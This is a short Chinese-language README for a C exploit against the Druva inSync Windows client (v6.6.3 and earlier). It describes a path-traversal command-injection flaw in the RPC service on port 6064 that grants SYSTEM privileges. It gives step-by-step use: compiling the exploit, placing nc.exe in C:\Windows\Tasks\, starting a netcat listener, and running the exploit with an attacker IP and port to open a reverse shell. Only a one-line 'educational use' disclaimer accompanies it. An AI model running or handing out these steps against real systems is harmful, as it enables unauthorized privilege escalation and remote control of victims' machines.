一个基于C的漏洞利用程序,针对Druva inSync Windows客户端(v6.6.3及以下版本)。该应用程序在端口6064上暴露了一个RPC服务,该服务存在通过路径遍历导致的命令注入漏洞。这使得本地用户可以以NT AUTHORITY\SYSTEM权限执行任意命令。
使用gcc(MinGW)编译源代码:
gcc exploit.c -o exploit.exe -lws2_32
将nc.exe副本放置于SYSTEM账户可访问的目录中(例如C:\Windows\Tasks\)。
在攻击者机器上启动监听器:
nc -lvnp 4444
在目标Windows机器上运行漏洞利用程序:
exploit.exe <攻击者IP> <攻击者端口> <NC路径>
示例:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
本工具仅用于教育目的。在未经授权的系统上使用,或对未获得许可的系统进行测试均属违法行为。